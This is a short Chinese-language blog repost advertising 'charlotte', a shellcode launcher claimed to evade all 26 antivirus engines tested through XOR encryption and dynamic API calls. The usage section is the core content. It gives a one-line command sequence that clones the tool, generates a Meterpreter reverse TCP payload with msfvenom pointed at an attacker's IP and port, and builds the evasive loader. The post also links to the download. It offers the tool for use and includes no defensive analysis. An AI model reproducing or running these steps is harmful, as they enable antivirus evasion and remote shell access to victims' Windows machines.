完全未被检测到的shellcode启动器

admin 2024年10月24日23:38:44评论17 views字数 549阅读1分49秒阅读模式
2021年5月13日:
c++ shellcode启动器,截至2021513日,0/26完全未被检测到。win32 api函数的动态调用shellcode和函数名的异或加密每次运行随机XOR键和变量在KaliLinux上,只需'apt-get install mingw-w64*'就可以了!

2021年5月17日

随机字符串长度和XOR键长度
完全未被检测到的shellcode启动器

使用

git clone存储库,生成命名为beacon.bin的shellcode文件,然后运行charlotte.py

注:使用msfvenom -p测试以及CobaltStrike原始格式Payload!

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*cd charlottemsfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.binpython charlotte.py

下载地址

https://github.com/9emin1/charlotte

如有侵权,请联系删除

完全未被检测到的shellcode启动器

原文始发于微信公众号(系统安全运维):完全未被检测到的shellcode启动器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月24日23:38:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   完全未被检测到的shellcode启动器https://cn-sec.com/archives/1845821.html

发表评论

匿名网友 填写信息